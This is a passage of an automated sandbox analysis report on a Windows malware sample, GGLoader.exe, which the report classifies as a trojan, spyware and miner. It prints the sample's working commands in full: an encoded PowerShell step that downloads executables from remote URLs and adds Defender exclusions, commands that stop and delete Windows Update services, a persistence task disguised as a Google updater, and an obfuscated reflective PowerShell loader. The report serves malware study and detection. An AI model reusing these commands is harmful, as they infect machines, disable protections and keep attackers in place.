                        Source: C:\Windows\System32\conhost.exeCode function: 41_2_000001C08C18B23C41_2_000001C08C18B23C
                        Source: C:\Windows\System32\conhost.exeCode function: 41_2_000001C08C19165841_2_000001C08C191658
                        Source: C:\Windows\System32\conhost.exeCode function: 41_2_000001C08C18F2F841_2_000001C08C18F2F8
                        Source: C:\Windows\System32\conhost.exeCode function: 41_2_000001C08C18B03041_2_000001C08C18B030
                        Source: C:\Windows\System32\conhost.exeCode function: 41_2_000001C08C1820DC41_2_000001C08C1820DC
                        Source: C:\Windows\System32\conhost.exeCode function: 41_2_000001C08C1BBE3C41_2_000001C08C1BBE3C
                        Source: C:\Windows\System32\conhost.exeCode function: 41_2_000001C08C1C225841_2_000001C08C1C2258
                        Source: C:\Windows\System32\conhost.exeCode function: 41_2_000001C08C1BFEF841_2_000001C08C1BFEF8
                        Source: C:\Windows\System32\conhost.exeCode function: 41_2_000001C08C1BBC3041_2_000001C08C1BBC30
                        Source: C:\Windows\System32\conhost.exeCode function: 41_2_000001C08C1B2CDC41_2_000001C08C1B2CDC
                        Source: C:\Windows\System32\dllhost.exeCode function: 42_2_00000001400014E442_2_00000001400014E4
                        Source: C:\Windows\System32\dllhost.exeCode function: 42_2_000000014000232842_2_0000000140002328
                        Source: C:\Windows\System32\dllhost.exeCode function: 42_2_00000001400026E842_2_00000001400026E8
                        Source: C:\Windows\System32\dllhost.exeCode function: 42_2_0000000140001DB442_2_0000000140001DB4
                        Source: C:\Windows\System32\dllhost.exeCode function: 42_2_0000021311182CDC42_2_0000021311182CDC
                        Source: C:\Windows\System32\dllhost.exeCode function: 42_2_000002131118BC3042_2_000002131118BC30
                        Source: C:\Windows\System32\dllhost.exeCode function: 42_2_000002131118FEF842_2_000002131118FEF8
                        Source: C:\Windows\System32\dllhost.exeCode function: 42_2_000002131118BE3C42_2_000002131118BE3C
                        Source: C:\Windows\System32\dllhost.exeCode function: 42_2_000002131119225842_2_0000021311192258
                        Source: C:\Windows\System32\winlogon.exeCode function: 43_2_00000225DC62165843_2_00000225DC621658
                        Source: C:\Windows\System32\winlogon.exeCode function: 43_2_00000225DC61B23C43_2_00000225DC61B23C
                        Source: C:\Windows\System32\winlogon.exeCode function: 43_2_00000225DC61F2F843_2_00000225DC61F2F8
                        Source: C:\Windows\System32\winlogon.exeCode function: 43_2_00000225DC61B03043_2_00000225DC61B030
                        Source: C:\Windows\System32\winlogon.exeCode function: 43_2_00000225DC6120DC43_2_00000225DC6120DC
                        Source: C:\Windows\System32\winlogon.exeCode function: 43_2_00000225DC65225843_2_00000225DC652258
                        Source: C:\Windows\System32\winlogon.exeCode function: 43_2_00000225DC64BE3C43_2_00000225DC64BE3C
                        Source: C:\Windows\System32\winlogon.exeCode function: 43_2_00000225DC64FEF843_2_00000225DC64FEF8
                        Source: C:\Windows\System32\winlogon.exeCode function: 43_2_00000225DC64BC3043_2_00000225DC64BC30
                        Source: C:\Windows\System32\winlogon.exeCode function: 43_2_00000225DC642CDC43_2_00000225DC642CDC
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: String function: 007A5D90 appears 54 times
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: String function: 00BF5D90 appears 54 times
                        Source: poduiwcd.tmp.7.drStatic PE information: Resource name: EXE type: PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                        Source: updater.exe.7.drStatic PE information: Number of sections : 11 > 10
                        Source: LicSend.exe.1.drStatic PE information: Number of sections : 11 > 10
                        Source: LicenseGet.exe.1.drStatic PE information: No import functions for PE file found
                        Source: LicenseGet.exe.1.drStatic PE information: Data appended to the last section found
                        Source: GGLoader.exe, 00000000.00000000.1702359898.0000000000FD8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameD1.exe4 vs GGLoader.exe
                        Source: GGLoader.exeBinary or memory string: OriginalFilenameD1.exe4 vs GGLoader.exe
                        Source: GGLoader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess created: Commandline size = 3770
                        Source: unknownProcess created: Commandline size = 5455
                        Source: unknownProcess created: Commandline size = 5516
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess created: Commandline size = 3770Jump to behavior
                        Source: GGLoader.exe, dmjzx.csBase64 encoded string: 'LUVuY29kZWRDb21tYW5kICJQQUFqQUdjQWNnQjRBQ01BUGdCVEFIUUFZUUJ5QUhRQUxRQlFBSElBYndCakFHVUFjd0J6QUNBQWNBQnZBSGNBWlFCeUFITUFhQUJsQUd3QWJBQWdBQzBBVndCcEFHNEFaQUJ2QUhjQVV3QjBBSGtBYkFCbEFDQUFTQUJwQUdRQVpBQmxBRzRBSUFBdEFFRUFjZ0JuQUhVQWJRQmxBRzRBZEFCTUFHa0Fjd0IwQUNBQUlnQkJBR1FBWkFBdEFGUUFlUUJ3QUdVQUlBQXRBRUVBY3dCekFHVUFiUUJpQUd3QWVRQk9BR0VBYlFCbEFDQUFVd0I1QUhNQWRBQmxBRzBBTGdCWEFHa0FiZ0JrQUc4QWR3QnpBQzRBUmdCdkFISUFiUUJ6QURzQVBBQWpBRzRBZFFCekFDTUFQZ0JiQUZNQWVRQnpBSFFBWlFCdEFDNEFWd0JwQUc0QVpBQnZBSGNBY3dBdUFFWUFid0J5QUcwQWN3QXVBRTBBWlFCekFITUFZUUJuQUdVQVFnQnZBSGdBWFFBNkFEb0FVd0JvQUc4QWR3QW9BQ2NBVGdCdkFDQUFWZ0JwQUhJQWRBQjFBR0VBYkFBZ0FFMEFZUUJqQUdnQWFRQnVBR1VBTHdCVEFHVUFjZ0IyQUdVQWNnQWdBR2tBY3dBZ0FHRUFiQUJzQUc4QWR3QmxBR1FBSVFBZ0FGUUFjZ0I1QUNBQWNnQjFBRzRBYmdCcEFHNEFad0FnQUc4QWJnQWdBR0VBSUFCa0FHa0FaZ0JtQUdVQWNnQmxBRzRBZEFBZ0FHUUFaUUIyQUdrQVl3QmxBQ0VBSndBc0FDY0FKd0FzQUNjQVR3QkxBQ2NBTEFBbkFFVUFjZ0J5QUc4QWNnQW5BQ2tBUEFBakFIY0Fhd0JyQUNNQVBnQTdBQ0lBT3dBOEFDTUFaUUJtQUhJQUl3QStBQ0FBUVFCa0FHUUFMUUJOQUhBQVVBQnlBR1VBWmdCbEFISUFaUUJ1QUdNQVpRQWdBRHdBSXdCbUFIQUFad0FqQUQ0QUlBQXRBRVVBZUFCakFHd0FkUUJ6QUdrQWJ3QnVBRkFBWVFCMEFHZ0FJQUJBQUNnQUpBQmxBRzRBZGdBNkFGVUFjd0JsQUhJQVVBQnlBRzhBWmdCcEFHd0FaUUFzQUNRQVpRQnVBSFlBT2dCVEFIa0Fjd0IwQUdVQWJRQkVBSElBYVFCMkFHVUFLUUFnQUR3QUl3QnVBSG9BYUFBakFENEFJQUF0QUVZQWJ3QnlBR01BWlFBZ0FEd0FJd0JoQUhFQVpBQWpBRDRBT3dBb0FFNEFaUUIzQUMwQVR3QmlBR29BWlFCakFIUUFJQUJUQUhrQWN3QjBBR1VBYlFBdUFFNEFaUUIwQUM0QVZ3QmxBR0lBUXdCc0FHa0FaUUJ1QUhRQUtRQXVBRVFBYndCM0FHNEFiQUJ2QUdFQVpBQkdBR2tBYkFCbEFDZ0FKd0JvQUhRQWRBQndBSE1BT2dBdkFDOEFZZ0JwQUhRQVlnQjFBR01BYXdCbEFIUUFMZ0J2QUhJQVp3QXZBRFVBT1FBMEFEQUFhZ0JuQURrQU9BQXpBRFFBTHdCbkFHWUFNd0EwQURRQU13Qm1BRE1BTHdCeUFHRUFkd0F2QURBQVlRQmtBR1lBWVFCbEFHWUFOQUJtQURnQU5BQTNBR0VBTVFBM0FHVUFZUUEwQUdVQU5BQm1BRFlBTlFBMkFHUUFZd0JrQURnQU5RQmxBRGNBTmdBeUFEa0FNd0EzQURnQU1BQmxBR1FBTHdCRUFDNEFaUUI0QUdVQUp3QXNBQ0FBUEFBakFIQUFhZ0I0QUNNQVBnQWdBQ2dBU2dCdkFHa0FiZ0F0QUZBQVlRQjBBR2dBSUFBOEFDTUFkZ0JqQUhrQUl3QStBQ0FBTFFCUUFHRUFkQUJvQUNBQUpBQmxBRzRBZGdBNkFGUUFaUUJ0QUhBQUlBQThBQ01BZVFCakFIa0FJd0ErQUNBQUxRQkRBR2dBYVFCc0FHUUFVQUJoQUhRQWFBQWdBQ2NBVEFCcEFHTUFaUUJ1QUhNQVpRQkhBR1VBZEFBdUFHVUFlQUJsQUNjQUtRQXBBRHdBSXdCaUFHY0Fhd0FqQUQ0QU93QWdBQ2dBVGdCbEFIY0FMUUJQQUdJQWFnQmxBR01BZEFBZ0FGTUFlUUJ6QUhRQVpRQnRBQzRBVGdCbEFIUUFMZ0JYQUdVQVlnQkRBR3dBYVFCbEFHNEFkQUFwQUM0QVJBQnZBSGNBYmdCc0FHOEFZUUJrQUVZQWFRQnNBR1VBS0FBbkFHZ0FkQUIwQUhBQWN3QTZBQzhBTHdCaUFHa0FkQUJpQUhVQVl3QnJBR1VBZEFBdUFHOEFjZ0JuQUM4QWNnQmxBR01BYUFCbEFHRUFkQUJ6QUc4QWNnQm5BQzhBY2dCbEFHTUFhQUJsQUdFQWRBQnpBR1FBYVFCeUFHVUFZd0IwQUM4QWNnQmhBSGNBTHdBd0FEQUFaUUJpQURJQVpBQXdBR0lBTkFBekFEWUFOUUE1QURFQVpnQmpBR1VBTVFBeEFEVUFNd0JpQUdFQVl3QmhBRGNBTmdBeUFEVUFNQUE1QUdVQU53QTJBRElBWmdBeUFHTUFaUUEwQUM4QVF3Qk1BRkFBTGdCbEFIZ0FaUUFuQUN3QUlBQThBQ01BY3dCaUFHUUFJd0ErQUNBQUtBQktBRzhBYVFCdUFDMEFVQUJoQUhRQWFBQWdBRHdBSXdCb0FIRUFkUUFqQUQ0QUlBQXRBRkFBWVFCMEFHZ0FJQUFrQUdVQWJnQjJBRG9BVkFCbEFHMEFjQUFnQUR3QUl3QnJBSGNBY3dBakFENEFJQUF0QUVNQWFBQnBBR3dBWkFCUUFHRUFkQUJvQUNBQUp3Qk1BR2tBWXdCREFHZ0FaUUJqQUdzQUxnQmxBSGdBWlFBbkFDa0FLUUE4QUNNQWF3QnBBSGdBSXdBK0FEc0F
                        Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.mine.winEXE@64/89@1/2
                        Source: C:\Windows\System32\dllhost.exeCode function: 42_2_0000000140002328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceA,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,HeapAlloc,CreateThread,CreateThread,Sleep,SleepEx,42_2_0000000140002328
                        Source: C:\Windows\System32\dialer.exeCode function: 37_2_00007FF790DC17A4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,37_2_00007FF790DC17A4
                        Source: C:\Windows\System32\dialer.exeCode function: 37_2_00007FF790DC194C FindResourceExA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,RegOpenKeyExW,RegSetValueExW,37_2_00007FF790DC194C
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\GGLoader.exe.logJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7232:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3412:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3332:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aro4libn.snb.ps1Jump to behavior
                        Source: GGLoader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: GGLoader.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\GGLoader.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: GGLoader.exeReversingLabs: Detection: 76%
                        Source: unknownProcess created: C:\Users\user\Desktop\GGLoader.exe "C:\Users\user\Desktop\GGLoader.exe"
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcgB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdQBzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUALwBTAGUAcgB2AGUAcgAgAGkAcwAgAGEAbABsAG8AdwBlAGQAIQAgAFQAcgB5ACAAcgB1AG4AbgBpAG4AZwAgAG8AbgAgAGEAIABkAGkAZgBmAGUAcgBlAG4AdAAgAGQAZQB2AGkAYwBlACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAawBrACMAPgA7ACIAOwA8ACMAZQBmAHIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHAAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHoAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAHEAZAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvADUAOQA0ADAAagBnADkAOAAzADQALwBnAGYAMwA0ADQAMwBmADMALwByAGEAdwAvADAAYQBkAGYAYQBlAGYANABmADgANAA3AGEAMQA3AGUAYQA0AGUANABmADYANQA2AGQAYwBkADgANQBlADcANgAyADkAMwA3ADgAMABlAGQALwBEAC4AZQB4AGUAJwAsACAAPAAjAHAAagB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBjAHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBjAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQApADwAIwBiAGcAawAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAGQAaQByAGUAYwB0AC8AcgBhAHcALwAwADAAZQBiADIAZAAwAGIANAAzADYANQA5ADEAZgBjAGUAMQAxADUAMwBiAGEAYwBhADcANgAyADUAMAA5AGUANwA2ADIAZgAyAGMAZQA0AC8AQwBMAFAALgBlAHgAZQAnACwAIAA8ACMAcwBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHEAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBrAHcAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBDAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAawBpAHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBkAGkAcgBlAGMAdAAvAHIAYQB3AC8AMAAwAGUAYgAyAGQAMABiADQAMwA2ADUAOQAxAGYAYwBlADEAMQA1ADMAYgBhAGMAYQA3ADYAMgA1ADAAOQBlADcANgAyAGYAMgBjAGUANAAvAEQAZQB2AG0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAGQAdQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABoAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdQBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAUwBlAG4AZAAuAGUAeABlACcAKQApADwAIwBoAHcAb
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\LicCheck.exe "C:\Users\user\AppData\Local\Temp\LicCheck.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\LicSend.exe "C:\Users\user\AppData\Local\Temp\LicSend.exe"
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:NGLbonfBsuNR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QtvYIpWnFCFICq,[Parameter(Position=1)][Type]$hhlNOVEDYw)$dpttUeHYiSd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'em'+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'yD'+'e'+'l'+[Char](101)+''+'g'+'at'+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+'ale'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dpttUeHYiSd.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+[Char](72)+'ide'+'B'+'y'+'S'+''+'i'+''+[Char](103)+''+','+'P'+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QtvYIpWnFCFICq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$dpttUeHYiSd.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+'g'+[Char](44)+'N'+'e'+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$hhlNOVEDYw,$QtvYIpWnFCFICq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $dpttUeHYiSd.CreateType();}$fxvCjurJEEUcT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 